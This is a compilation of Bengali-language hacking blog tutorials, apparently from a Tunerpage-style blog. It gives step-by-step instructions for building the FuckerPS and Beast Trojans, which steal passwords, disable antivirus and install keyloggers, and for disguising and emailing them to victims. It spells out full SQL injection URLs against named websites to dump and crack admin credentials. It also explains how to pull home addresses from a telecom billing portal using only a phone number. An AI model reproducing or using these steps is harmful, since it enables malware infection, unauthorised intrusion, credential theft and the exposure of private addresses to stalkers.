FuckerPS Trojan Hacking Tutorial

*****বিসমিল্লাহির রাহমানির রাহিম*****

আসসালামু আলাইকুম, কেমন আছেন সবাই ? আশা করি মহান আল্লাহ তায়ালার অশেষ রহমতে সবাই ভাল আছেন । আমার আজকের টিউনে  সবাইকে স্বাগত । প্রায় ১ মাস আগে শুরু করেছিলাম ট্রোজান নিয়ে ধারাবাহিক টিউন। আজ ধারাবাহিক টিউনের ষষ্ঠ পর্ব। আর মাত্র কয়েক টি টিউন করব তারপর শেষ হয়ে যাবে । আজ আর কথা বাড়ালাম না। শুরু করা জাক আজকের টিউন।
অনেকের ধারণা হয়েছে আমি নাকি সফটওয়্যার সাথে ভাইরাস দেই। এইটা সম্পূর্ণ মিথ্যা । আমি নেট থেকে যেরকম ডাউনলোড করি ঠিক ওইরকম সফটওয়্যার টা মিডিয়াফায়ার-এ আপলোড করে আপনাদের দেই। অনেকের হয়ত সফটওয়্যার নিয়ে কোন problem হইছে তাই তারা এ কথাটা বলেছে। আজ আমি যে সফটওয়্যার টা নিয়ে লিখব, আশা করি এই সফটওয়্যার টা নিয়ে কারো কোন problem face করতে হবে না। আর আজকের টিউন টা অনেক ছোট এবং অনেক অনেক সহজ।

বিস্তারি টিউন লিখতে অনেক time লাগে। আর প্রতি পর্বে একই লেখা বার বার লেখতে ভালো লাগে না। তাই দয়া করে সবাই[যারা আগে টিউন গুলো পড়েন নাই] প্রথম পর্ব  থেকে পড়া শুরু করেন। তাহলে বিস্তারিত জানতে পারবেন।

• প্রথম   পর্ব।    "LORD PS"

• দ্বিতীয় পর্ব।    "ProRat v1.9 "

• তৃতীয়  পর্ব।   "Maya Password Stealer"

• পঞ্চম   পর্ব।    "l337 virus creator(Right Hand Man’s)"

• চতুর্থ   পর্ব।    "Beast"

• ষষ্ঠ পর্ব।         "FUCKER PS"

আজকে যে Trojan নিয়ে লিখব তার নাম হল "FUCKER PS'  । অনেকটা LordPS-এর মত।

এটি নিয়ে কাজ করার আগে সবার প্রথমে আপনার পিসির এন্টিভাইরাস diasble করুন/ টোটালি অফ করুন। এন্টিভাইরাস টোটালি অফ করার কথা বলা হয়েছে এই কারনে, কারন এন্টিভাইরাস এটিকে ভাইরাস  সফটওয়্যার হিসাবে ধরবে  এবং আপনাকে কাজ করতে দিবেনা।

প্রথম সফটওয়্যার টি ডাউনলোড করে নিন

সফটওয়্যার টি ওপেন করার পর নিচের ছবির মত আসবে। এইটা হল কাঙ্ক্ষিত সফটওয়্যার। যেটা দিয়ে ভাইরাস Trojan virus বানানো হবে।

 

www.freecall24.blogspot.com

এখন সফটওয়্যার-এর বাম পাশের অপশন গুলো দেখেন। দেখলে আপনারা নিজেরাই বুজতে পারবেন এখন কি করতে হবে। যদি আগের পর্ব গুলো দেখে থাকেন তাহিলে আমার আর কিছু বলতে হবে না মনে হয়।
যাই তাও কয়েক টা অপশন সম্পর্কে লিখব। এখানে ৩৪ টা অপশন আছে। আপনি ভিকতিমের পিসি-তে কি কি তান্দব চালাবেন ওই ঘর গুলোতে টিক(mark) দিবেন।

TJ M!R HACKING TUTORIAL

১..উপরের ছবটা দেখেন।এগুলো  হল আপনি ভিকটিমের পিসি-থেকে কি কি তথ্য পেতে চান। এখন আপনি যা যা চান সে ঘর গুলোতে টিক দিন। আপনি যদি
""yahoo, Mns, phone number, OutLook, Intnet Explorer""" এর পাসওয়ার্ড চান তাহলে ওই ঘর গুলোতে টিক দিন।

2..এখন আপনি কিছু জিনিষ হাইড করে দিতে পারেন ভিকটিমের পিসি থেকে। যা হাইড করতে চান ওই ঘর গুলতে টিক দিন।

TJ M!R.

এখন "Disable kasper Spy & Disable Other Anti Virus" ঘর গুলোতে টিক দিন। তাহলে পরবর্তীতে ভিকটিমের অ্যান্টিভাইরাস কোন বাধা দিতে পারবে না। কারন তার অ্যান্টিভাইরাস disable হয়ে যাবে।
এখন আপনার ইচ্ছা মত বাকি ঘর গুলোতে টিক দিতে পারেন।

TJ M!R

এখন "Sender"-এ আপনার মেইল গুলো লেখেন। এবং "Fake Error"-এ যেকোনো  বার্তা লেখেন। তারপর "Creat Server"-এ ক্লিক করে ভাইরাস ফাইলটি তৈরি করুন।
যে ফাইলটা  তৈরি হবে ওই ফাইলটা compressed করেন। তারপর ভিকটিম কে মেইল করে পাঠিয়ে দিন। ১ সাপ্তাহ পরে আপনি পেয়ে যাবেন সব তথ্য । "sender"এ যে মেইল অ্যাড্রেস গুলো দিছেন ওই মেইল গুলোতে নোটিফিকেশান আসবে। আগের পর্ব গুলো দেখেন। তা নাহলে কিছুই বুজবেন না ।
এই পর্বটা এখানেই শেষ ।
টিউনে কোন ভুল হলে আমাকে ধরিয়ে দিবেন। আর জানাবেন কি রকম টিউন আপনাদের পছন্দ । তাহলে পরবর্তীতে ভালো টিউন করতে পারব।
সবাই ভালো থাকবেন।

what is SQL and how to hack a website [ part-2]

SQL Inj3cti0n কি ?

সহজ ভাষায় বলতে গেলে SQL Inj3cti0n হলো এমন একটি code inj3cti0n কৌশল যা কোনো সাইটের ডাটাবেজের সিকিউরিটি কে ভেঙ্গে তা থেকে ইনফরমেশন বের করতে পারে।

যে কোনো সাইটে SQL Inj3cti0n করা যাবে ?

না। SQL Inj3cti0n তখনি কাজ করবে যখন কোনো সাইটে SQL error থাকবে।

কোনো সাইটে SQL error আছে কি নেই তা বুজবো কিভাবে ?

যেই সব সাইটে id=value থাকে ধরুন
http://www.site.com/news.php?id=5
সাধারণত এই সব সাইটে SQL error থাকে। কোনো সাইটে SQL error এভাবেই দেখাবে না, error দেখার জন্য আপনাকে url এর শেষে একটি '(string) দিতে হবে।
উদাহরণঃ http://www.bayviewhotelni.com/news.php?id=3 এটি হচ্ছে আসল লিঙ্ক, এই লিঙ্কে যখন আপনি ব্রাউজারে লোড করবেন তখন কোনো error আসবে না। যখন আপনি url এর শেষে একটি '(string) দিবেন তখন ঠিকই error আসবে।
http://www.bayviewhotelni.com/news.php?id=3'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3''' at line 1
অথবা অনেক সময় দেখতে পারবেন যখন ' বসিয়েছেন তখন সাইটে যদি কোনো ছবি/ডাটা মিস করে তাহলে ও অই সাইটে SQL error আছে।
অর্থাৎ বোঝা গেলো এই সাইটে SQL error আছে। তাই আমরা এই সাইটটি কে SQL Inj3cti0n করেন হ্যাক করতে পারবো।

কিভাবে SQL inj3ction করবো কোনো সাইটকে ?

প্রথমে আমরা মজিলাতে একটি এডন ইন্সটল করবো যার নাম হচ্ছে HaCkBar. এই এডনটি ব্যবহার করলে কিছু কমান্ড দিতে সহজ হয়।
ডাউনলোড করে নিন এখান থেকে : https://addons.mozilla.org/en-us/firefox/addon/hackbar/
ইন্সটল করার পরেই দেখবেন আপনার ব্রাউজারে এডনটি দেখা যাচ্ছে।

সাইটের মোট কলাম নাম্বার বের করার নিয়ম :-

আপনি যখন SQL error কোনো সাইটকে SQL Inj3cti0n করতে যাবেন তখন আপনার প্রথম কাজ হবে সাইটের ডাটাবেজে মোট কয়টি কলাম আছে তা বের করা। আর বের করার পদ্ধতি হলো order by কমান্ড।
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 1--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 2--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 3--
এভাবে যেতে থাকবেন যতক্ষণ পর্যন্ত কোনো Err0r না আসে।

http://www.sparkleappealdorset.org/supporter.php?id=7 order by 11--
দিলে কিছু লিখা অদৃশ্য হয়ে যায় অর্থাৎ এই সাইটটিতে মোট 10 টি কলাম আছে।

Vulnerable কলাম বের করার নিয়ম :-

এখন আমাদের দেখতে হবে এই সাইটের ১০ টি কলামের মধ্যে কতটি কলাম vulnerable. যেই সব কলাম vulnerable সেই সব কলাম থেকেই ডাটাবেজ এর ইনফরমেশন বের করা যাবে। আমরা Union Select কমান্ড ব্যবহার করে সাইটের vulnerable কলাম গুলা বের করবো।
প্রথমে union select তারপরে যে কইটি কলাম সে কলাম গুলা ঠিক এভাবে বসাতে হবে। আর id=value er আগে একটি - চিহ্ন বসাতে হবে যেমন- http://www.sparkleappealdorset.org/supporter.php?id=-7
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,2,3,4,5,6,7,8,9,10--

ডাটাবেজ ভার্শন বের করার নিয়ম:-

যে কোনো একটি vulnerable কলামে আমরা SQL কমান্ড বসাবো যাতে আমরা ডাটাবেজের ইনফরমেশন বের করতে পারি। কোনো সাইটের ডাটাবেজ এর ভার্শন যদি 4 হয় তাহলে তা ম্যানুয়ালি inj3ct করা যাবে না। তখন টুলস ব্যবহার করতে হবে like havij । আর যদি 5 হয় তাহলে আমরা ম্যানুয়ালি inj3ct করতে পারবো।
এই সাইটটিতে অনেক গুলা vulnerable কলাম আমাদের যে কোনো একটিকে বাছাই করে নিতে হবে।
ধরি আমরা ২ নাম্বার কলাম থেকে ডাটাবেজ ভার্শন বের করবো।
তাহলে syntax টি হবে
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,version(),3,4,5,6,7,8,9,10--
vulnerable কলামে version() রিপ্লেস করলেই ডাটাবেজের ভার্শন চলে আসবে।

ডাটাবেজ থেকে টেবিল বের করার নিয়ম :-

vulnerable কলামের জাগায় group_concat(table_name) এবং এক দম শেষ কলামের পরে from information_schema.tables where table_schema=database()--
তাহলে syntax টি দাড়ায়
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--

যে টেবিল গুলো আমরা পেলাম তা হলো event,galleryImage,login_admin,supporter
এখানে এডমিন টেবিল হচ্ছে login_admin, এই টেবিল থেকে আমরা এডমিনের ইউসার এবং পাসওয়ার্ড বের করবো।

এডমিন টেবিল থেকে ইউজার এবং পাসওয়ার্ড বের করার নিয়ম :-

vulnerable কলামের জাগায় group_concat(column_name) এবং এক দম শেষ কলামের পরে from information_schema.columns where table_name=0xএডমিন টেবিল নামের হেক্স কোড--

তাহলে syntax টি দাড়ায়
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e--

এডমিন ইউসার এবং পাসওয়ার্ড বের করার নিয়ম :-

vulnerable কলামের জাগায় concat{যে কলাম গুলো পেয়েছেন সে গুলো(সব গুলো কলাম নয় সুধু মাত্র ইউসার এবং পাসওয়ার্ড এর কলাম)} এবং এক দম শেষ কলামের পরে কোন টেবিল থেকে এই কলাম পেয়েছেন সেই টেবিলের নাম।
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,concat(uid,0x3a,pwd),3,4,5,6,7,8,9,10 from login_admin--

বাস পেয়ে গেলেন সাইটের এডমিন পাসওয়ার্ড । এখন পুরো সাইটি আপনার হাতে যা খুশি তাই করুন। তবে মারাত্মক কোনো ক্ষতি না করাই ভালো। সহজেই হয়ে গেলেন একজন ওয়েব হ্যাকার

what is SQL and how to hack a website

SQL injection কি ?

 হ্যাকিং করার অনেকগুলো পদ্ধতি আছে। আর এর মধ্যে সবচেয়ে যেটা বেশি জনপ্রিয় সেটা হল SQL. অনেকেই হয়ত জানেন না SQL এর পূর্ণরূপ। SQL এর পূর্ণরূপ হল Structured Query Language. এটা একটি হাই লেভেল ল্যাঙ্গুয়েজ। যেটা মানুষকে স্তব্দ করে দেয়। যেমনঃ- select, add data, delete data, update data এর জন্য যথাক্রমে SELECT,INSERT,DELETE,UPDATE কোয়ারিগুলো ব্যবহৃত হয় এখানে। সাধারণত SQL ডাটাবেজ ডিজাইনের জন্য ব্যবহৃত হয়। তথ্য সাধারণত ডাটাবেজে সেভ থাকে। আর SQL injection এর কাজ হল একটি ত্রুটিপূর্ণ এ্যাপ্লিকেশানের ডাটাবেজের ত্রুটি বের করে এখানে আক্রমণ করে ডাটাবেজ দেখা ও ডেটাবেজের সম্পূর্ণ নিয়ন্ত্রণ নিয়ে ফেলা। আর এই ধরনের ডেটাবেজের লিংক  দেখতে এমন হয়

www.anything.com/something.php?something=something

যেমনঃ-

www.tartanarmy.com/news/news.php?id=130.

এখানে ১৩০ হল, আমরা ডেটাবেজের ১৩০ পার করেছি। এখন আপনি এই লিংকের একদম শেষে একটি চিহ্ন যোগ করে এটার ত্রুটি বের করবেন। চিহ্নটি হল ( ‘ ) । যেমনঃ-

www.tartanarmy.com/news/news.php?id=130'

তাহলে একটি ইরর দেখাবে।

https://www.facebook.com/unselected

এবার একটু বেসিক জিনিস দেখেনঃ—–>
প্রত্যেক ডাটাবেজ সার্ভারের উপর ডাটাবেজ আছে। তাই না ?? আবার প্রত্যেক ডেটাবেজের টেবিলও রয়েছে। আবার প্রত্যেকটি টেবিলের রয়েছে বিভিন্ন কলাম। আর এই কলামগুলোতে থাকে ডাটা সংরক্ষিত।

https://www.facebook.com/unselected

https://www.facebook.com/unselected

উপরের ছবিতে দেখুন ডাটাবেজ আছে ৬টা আমরা “explore_hacking” ডাটাবেজটা সিলেক্ট করলাম। এটার দেখুন ৪টা টেবিল আছে admin, articles, products, subscribers. প্রতিটি টেবিলের রয়েছে আরও কলাম ও ডেটা। যেমনঃ- আমি ‘admin’ টেবিলটি সিলেক্ট করলাম। এখন দেখূন, এটা রয়ে id, username, password, email কলাম। আর এই সম্পর্কে আরও বিস্তারিত জানতে আমার phpmyadmin টিউটোরিয়াল ও PHP & MySQL টিউটোরিয়ালগুলো দেখূন। তাহলে আরও ভাল করে বুঝতে পারবেন।

information_schema কি ?

এটা হল information database. আর এটি SQL database severs(version>5) এ ডিফল্ট ভাবে থাকে। এখানে সব ধরনের তথ্য সংরক্ষিত থাকে। যেমনঃ- টেবিলের নাম, কলামসহ সব তথ্য।

https://www.facebook.com/unselected

এখন আমারা “information_schema” ডেটাবেজটি ওপেন করলাম। আর এই ডেটাবেজের টেবিলটির নাম হল ”TABLES”

https://www.facebook.com/unselected

————————————————————————————————————————————————————

এতক্ষণ পর্যন্ত যত বকবক করলাম এটা কিন্তু টিউটোরিয়ালে অংশবিশেষ। এক ঢিলে দুই পাখি মারার ব্যবস্থা করলাম আপনাদের জন্য। এবার আমরা যাবো, মূল টিউটোরিয়ালে। আপনি যাবেন ???? আসেন ঘুরে আসি, কি করা যায়। একদমই বিস্তারিত ভাবে শিখুন। একদমই সহজ পদ্ধতিতে।

————————————————————————————————————————————————————

-: SQL Injection টিউটোরিয়াল :-

প্রথমে এখানে লগইন করুন।

http://www.tartanarmy.com/news/news.php?id=130

শুধু url দিলেই হবে না। এখানের ভ্যালুয়ারেবল কলাম খুঁজে বের করতে হবে। একবার একটা টিউটোরিয়ার শুরু করেছিলাম SQL এর উপর। কিন্তু সেটার ৩ পর্ব লিখে থেকে গিয়ে ছিলাম। কারণ অনেক চিন্তা ভাবনা, সময়সহ আরও অনেক ঝামেলার কারণে সেটা আর করতে পারি নি। কিন্তু চিন্তা আছে সমানে দুটা একসাথে শুরু করবো। BackTrack ও SQL . সাথেই থাকবেন।

কলাম কিভাবে বের করবেনঃ-

এখানে আমারা “ORDER BY” clause ব্যবহার করবো। এটা ব্যবহার করা হয় যাতে sort the columns এর জন্য। এখন যে  কোন একটি নাম্বার সিলেক্ট করুন। যেমনঃ- 10. “–” এটি ব্যবহার করা হয়, কমেন্টের পরে কিছু করার জন্য।

এবার url টিতে যান

http://www.tartanarmy.com/news/news.php?id=130 order by 10--

উপরের লিংকটি কপি করে ব্রাউজারে পেষ্ট করুন। অথবা এখানে ক্লিক করুন Click here

মূলত এখানে আমরা ১০টি কলাম নির্দিষ্ট করলাম। যখনই আপনি এটা দিলেন, এটি সাথে সাথে একটি ইরর ম্যাসেজ দিলো, তার মানে এখানে কলাম ১০ টি থেকে কম আছে। এবার 10 এর পরিবর্তে 9 দিন।

http://www.tartanarmy.com/news/news.php?id=130 order by 9--

এখন এটি আবারও ইরর দিলো ! তার মানে এখানও এটা বুঝায় যে, কলাম ৯টির চেয়ে কম আছে। এবার আমরা একটু পন্ডিতি করে 9 এর জায়গায় 6 দিলাম।

http://www.tartanarmy.com/news/news.php?id=130 order by 6--

বাহ এটি ইরর দেয় নি। তার মানে আমরা পেয়ে গেছি। এটি যেহেতু কোন ইরর দেয় নি, তার মানে এটির ৬টি কলাম আছে।

vulnerable columns খুঁজে বের করাঃ-

একটু আগে আমরা যা করলাম তাহল, ডেটাবেজটিতে কয়টি কলাম আছে, তা বের করলাম। এখন আমরা বের করলাম কোন কলামটি vulnerable . এবার আমরা “UNION ALL” ও “SELECT” command ব্যবহার করে দেখবো।  130 এর সামনে একটি ড্যাস চিহ্ন (-) দিন।

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--.

অথবা এখানে ক্লিক করুন Click here

এখানে আমাদের একটি জোড় সংখ্যা পেত হবে। এখন এখানে দেখুন, যে সংখ্যাটি বোল্ড করা সেটি হল vulnerable columns. এখানে 2 নংটি হল vulnerable

https://www.facebook.com/unselected

database version খুঁজে বের করাঃ-

এবার “@@version” বা “verson()”  দিয়ে most vulnerable column টি রিপ্লেস করুন। তবে এখানে প্রথম কমান্ডটি কাজ না করলে পরেরটা হবে।

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6--

অথবা এখানে ক্লিক করুন Click here

তাহলে আপনি আপনার স্ক্রীণে ভার্সন দেখতে পাবেন। ভার্সন পাবেন ৫.something. মানে ৫ থেকে বেশি পাবেন।  তবে কিছু কিছু ক্ষেত্র ৫ এর কম হয়, কারণ “information_schema” এ কোন ডেটাবেজ থাকে না।

https://www.facebook.com/unselected

table names খুঁজে বের করাঃ-

এবার “table_name” এ ভ্যালুয়ারেবল কলাম দিন।

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from   information_schema.tables where table_schema=database()--

অথবা এখানে ক্লিক করুন Click here
আমরা একটি পেলাম

https://www.facebook.com/unselected

এবার সকল টেবিল পেতে ব্যবহার করুন group_concat

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where                                             table_schema=database()--

অথবা এখানে ক্লিক করুন Click here

column names খুঁজে বের করাঃ-

এক রকম সকল টেবিল পেতে এটি ব্যবহার করুন ‘table’ with ‘column’

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--

অথবা এখানে ক্লিক করুন Click here
আমরা এখন পরিবর্তনে ‘id’ পেলাম। এটা থেকে আমরা জানব যে, কোন টেবিলের কোন কলাম

https://www.facebook.com/unselected

কলাম থেকে ডাটা নিয়ে আসা

এখন আমরা যে কোন একটি কলাম থেকে ডাটা নিয়ে আসবো। কিন্তু যেটা সবচেয়ে মজার বিষয় সেটা হল username ও password.

এই কলামের প্রথম টেবিল হল tar_admin. এখন আমরা “0x3a” কমান্ডটি ব্যবহার করবো। এটা ব্যবহার করা হয়, যাতে রেজাল্টের একটা সাথে আরেকটা কোলন দিয়ে আলাদা আলাদ থাকে। এটাকে বলে hex of colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--.

অথবা এখানে ক্লিক করুন Click Here

https://www.facebook.com/unselected

তাহলে আমরা ইউজার নেম ও পাসওয়ার্ড পেয়ে যাবো। কিন্তু পাসওয়ার্ড encrypted করা থাকে। বেশির ভাগ encryptions are crackable. এখন যে কোন একটি ইউজারনেম নেন। যেমনঃ- “Sneds”. পাসওয়ার্ড 7d372d3f4ad3116c9e455b20e946dd15 থেকে encrypted করতে হবে।

http://md5crack.com/crackmd5.php

উপরে লিংকে গিয়ে hashed(encrypted) password টি দিন ও ক্র্যাক করে নিন। এখন আমরা পাসওয়ার্ডটি একদমই সহজ ভাষায় পেলাম। আর সেটা হল ‘oorwullie’

ওয়েবসাইটের লগইন পেজ কোথায় পাবো ?

অনেক কষ্টে হ্যাস ক্র্যাক করে পাসওয়ার্ড বের করলাম সাথে ইউজারনেম জোগাড় করলাম। কিন্তু এখন এগুলো দিয়ে উক্ত সাইট ক্র্যাক করবো??? কোন সমস্যা নাই
বেশিরভাগ ওয়েবসাইটের লগইন পেজ ডিফল্ট ভাবে এক জায়গায় থাকে। এখন কিছু নমুনা দেখেনঃ——>

www.xyz.com ————————-> www.xyz.com/admin

www.xyz.com ————————-> www.xyz.com/administrator

www.xyz.com ————————-> www.xyz.com/adminlogin

আর যদি কারও খুঁজে পেতে সমস্যা হয়, তাহলে আমার এই টিউটোরিয়ালটি দেখতে পারেন।

এছাড়াও আপনি admin page finder নামের একটা টুলস ব্যবহার করতে পারেন।

ডাউনলোড লিংক

Beast Trojan Hacking Tutorial..24

*****বিসমিল্লাহির রাহমানির রাহিম*****

আসসালামু আলাইকুম, কেমন আছেন সবাই ? আশা করি মহান আল্লাহ তায়ালার অশেষ রহমতে সবাই ভাল আছেন । আমার আগের টিউন করে অনেক উৎসাহ পাইছি । পঞ্চম পর্ব ইতিমধ্যে প্রকাশিত হয়ে গেছে । আর এটা হল চতুর্থ পর্ব । এখন চতুর্থ পর্বের টিউন করতে বসলাম । এই পর্বে আবার আর একটা মারাত্মক Trojan ভাইরাস দিয়ে কিভাবে অন্যজনের পিসি হ্যাক করা যায় এবং কিভাবে এই ভাইরাসের আক্রমন থেকে বাচা যায় এই নিয়ে টিউন করবো। Trojan ভাইরাস নিয়ে টিউন শেষ টিউনের কথা ছিল। ভাবতেছি এই ধারাবাহিক টিউন শুধু ট্রাজোন নিয়েই করব। সম্ভাবত Trojan নিয়ে ১০ পর্বের টিউন করা হতে পারে। Trojan নিয়ে শেষ পর্বটা হবে কিভাবে খুব সহজে ভিকটিম কে ধোঁকা দিয়ে তার পিসি-তে ভাইরাস রান করা জায় এবং কিভাবে এই ভাইরাসের হাত থেকে সম্পূর্ণ ভাবে রক্ষা পাওয়া যায়। বেশি কথা না বলে কাজ শুরু করি। কথা কম কাজ বেশি।

• প্রথম পর্ব। "LORD PS"
• দ্বিতীয় পর্ব। "ProRat v1.9 "
• তৃতীয় পর্ব। "Maya Password Stealer"
• পঞ্চম পর্ব। "l337 virus creator(Right Hand Man’s)"
• চতুর্থ পর্ব। "Beast"

আজকে যে Trojan নিয়ে লিখব তার নাম হল "beast"

এটি নিয়ে কাজ করার আগে সবার প্রথমে আপনার পিসির এন্টিভাইরাস diasble করুন/ টোটালি অফ করুন। এন্টিভাইরাস টোটালি অফ করার কথা বলা হয়েছে এই কারনে, কারন এন্টিভাইরাস এটিকে ভাইরাস সফটওয়্যার হিসাবে ধরবে এবং আপনাকে কাজ করতে দিবেনা।

প্রথম সফটওয়্যার টি ডাউনলোড করে নিন



সফটওয়্যার টি ওপেন করার পর নিচের ছবির মত আসবে। এইটা হল কাঙ্ক্ষিত সফটওয়্যার। যেটা দিয়ে ভাইরাস Trojan virus বানানো হবে।

***বিঃদ্রঃ-দয়াকরে এই ট্রাজোন-এর কেউ অপব্যাবহার করবেন না। আর কেউ ক্ষতিগ্রশ্ত হলে আমি(মীর) অথবা tunerpage দায়ী থাকবেনা।


এখন চলুন শুরু করা যাক কিভাবে Trojan বানাবেন। "Build Server"-এ ক্লিক করুন। আর statistics টা ক্লোজ করে দেন।

Server Settings

"Basic" 1

basicএ ক্লিক করে, Name-এ আপনার ইচ্ছা মত যেকোনো নাম দিতে পারেন। এবং ভাল মানের একটি পাসওয়ার্ড দিন। এ ২টা জিনিস মনে রাখতে হবে। পরে কাজে লাগবে। এখন basic এর কাজ শেষ।

"Notifications"2

"SIN"-এ ক্লিক করুন। তারপর Get IPতে ক্লিক করন। এবং Connection Time-out-এ ২০, ৩০, ৫০, ২০০ ইচ্ছা মত সেকেন্ড দিতে পারেন। এইটা হল কত সেকেন্ড পর connection বিচ্ছিন্ন হবে।



"E-Mail" আপনার মেইল address লিখুন। আপনি যে মেইল-এ notification পেতে চান ওই mail address লিখুন।

ICQ & CGI সম্পর্কে যদি না জানেন তাহলে ওগুলো পরিবরতন করার প্রয়োজন নাই।

"StartUp"3

সব গুলো ঘরে টিক দিন। [যদি ডিফল্ট ভাবে টিক না দেওয়া থাকে ]

"AV-FW Kill"4

এখন "Kill AV -FW On Start" & "Disable XP FireWall" ঘরে টিক দিন । এই ধাপের কাজ শেষ ।

"Misc."5

এখন প্রথম ৪ টা ঘরে টিক দিন।[উপরের ছবি দেখুন]

এগুলো হল (১)ভিকটিম-এর পিসি-টে melt server install, (২)KeyLogger সেটআপ করা , (৩) Restore point রিমুভ করে দেওয়া। যাতে ভিকটিম তার পিসি restore করতে পারবে না। (৪)একটু পর পর ফেক ইরর বার্তা শোও করা। এখন আপনি ইচ্চা করলে বাকি গুলোও মার্ক করতে পারেন।

"Exe Icon"6

এখন যেকোনো একটা আইকন সিলেক্ট করেন। এক্ষেত্রে একটু চালাকি করতে হয়। যেমন আপনি একটি ভাল আইকন দিতে পারেন। যাতে ভিকটিক খুব আগ্রহের সাথে ফাইলটি-তে ক্লিক করে। অথবা আপনি আপনার পিসি থেকেও সুন্দর যেকোনো আইকন দিতে পারেন। এখন সব কাজ শেষ এখন শুধু ফাইলটা বানানোর পালা।

"Save Server"এ ক্লিক করলে ভাইরাস ফাইল তৈরী হবে।



এখন Beast software টি যে ফোল্ডার(location) থেকে রান করেছেন ওইখানে দেখুন ফাইলটি সেভ হয়েছে।

এখন server নামের ফাইল টা rename করেন । এবং এমন একটা নাম দেন জেন ভিকটিম সহজে ক্লিক করে।

এখন ফাইলটা কে compressed করেন এবং মেইল করে পাঠিয়ে দিন আপনার শত্রুকে। আমার আগের টিউন গুলো দেখেন, তাহলে আপনাদের কাছে ব্যাপারটা আড়োও সহজ লাগবে। আমি আপনাদের কিছু ইমেইল অ্যাড্রেস দিমাল এখানে।

এখন ভিকটিম যদি আপনার বানান ফাইল-এ ক্লিক করে তাহলে আপনার মেইল অ্যাকাউন্ট-এ message আসবে, যে কেউ আপনার ফাইল-এ ক্লিক করেছে।

এখন আসুন কিভাবে আক্রমন চালাবেন??

এখন host-এ IP address টি লিখুন। এবং আপনার পাসওয়ার্ড টি লিখে Go BEAST!-এ ক্লিক করে connect করুন। ("Notifications"2-এ যে ip ছিল ওইটা)

connect হয়ার পর সফটওয়্যার-এর দান পাশের অপশন গুলো দ্বারা ভিকটিম-এর পিসি নিয়ন্ত্র করতে পারবেন।

অনেক গুলো অপশন থেকে আমি মাত্র কয়েকটা নিয়ে লিখব আর বাকি গুল আশা করি আপনারা নিজেরাই বুজতে পারবেন। অথবা ৫ম পর্ব টিনের নিচে দেখুন।

"Manager"

এখানে অনেক গুলো অপশন আছে।
এখান থেকে আপনি ভিকটিম আর webcam,Screen, Apps, File ect দেখতে পারবেন।

"Windows"

এখানেও অনেক গুলো অপশন আছে।
এখান থেকে আপনি ভিকটিম-এর সব কিছু হাইড, crash,shut down, restart, log off করতে পারবেন।

"lamer Stuff"

অনেকে আছে জারা লেমান মানে জানেন না। লেমার মানে হল ক্ষোরা বা পঙ্গু লোক।



এখানেও অনেক গুলো অপশন আছে।
এখান থেকে আপনি ভিকটিম-এর মাউস হাইড, সিডি রম লক, ওয়ালপেপার পরিবর্তন এবং চ্যাট করতে পারবেন।

"Misc"

নিচের ছবি টা দেখেন তাহলে সব বুজতে পারবেন ।

আশা করি এখন BEAST সম্পর্কে আপনাদের মটামটি ধারনা হয়েছে আর কিভাবে এটা দিয়ে attack করতে হয় টা জানতে পারেছেন। অপরিচিত কেউ আপনাকে mail করে কোন ফাইল পাঠালে ডাউনলোড করার পর ওপেন করার আগে অবশ্যই স্ক্যান করে নিবেন।

অনেক সময় নিয়ে গুছিয়ে টিউন করেছি। জানি না আপনাদের কেমন লেগেছে।আর টিউন এ কোন ভুল হলে ধরিয়ে দিবেন। তাহলে পরবর্তীতে আড়ও ভাল টিউন করতে পারব। সবাই ভাল থাকবেন।

tunerpage-এ শুরু হয়েছে "কে হবে ২০১২-এর শেরা TJ" আশা করি সবাই টিউন করার চেষ্টা করবেন। আর টিউন করতে না পারলে কমেন্ট করতে পারেন। কমেন্ট করলে-ও prize আছে।

সবাই টিউনারপেজের সঙ্গে থাকুন।

find any house address by T&T mobile number

 যেকোনো বাসার এড্রেস বের করুন tnt নম্বর থেকে.....খুব সহজে

প্রথম এখানে যান............http://203.112.222.42/
তারপর loginএ ক্লিক করুন।
আপনি যে নম্বরের এড্রেস বের করতে চান এরিয়া কোডসহ সেই নম্বরটি usernameএ বসান। পাসওয়ার্ডও সেই নম্বরটিই ( এরিয়া কোডসহ )।
যেমন আপনি  0284754xx এই নম্বরের এড্রেস বের করতে চাই। তাই এটাকেই ইউজারনেম এবং পাসওয়ার্ড হিসেবে ব্যাবহার করুন।
এরপর Login এ ক্লিক করে login করুন।
তারপর PRINT/VIEW CUSTOMER BILL এ ক্লিক করুন।
তারপর VIEW PAYMENT STATUS এ ক্লিক করুন।
তারপর  কোন মাস থেকে কোন মাশ আর details দেখতে চান তা লিখে submit করুন।  তাহলে সব তথ্য পেয়ে জাবেন।

বিঃদ্রঃ অন্য কেউ যাতে আপনার এড্রেস না পায় তার জন্য পাসওয়ার্ডটি চেঞ্জ করে ফেলুন । যারা পাসওয়ার্ড চেঞ্জ করে ফেলবে, এই পদ্ধতিতে তাদের এড্রেস বের করা যাবে না।

hack citycell mobile pin code

সিটিসেল ফোনের পিন কোড হ্যাক করুন।

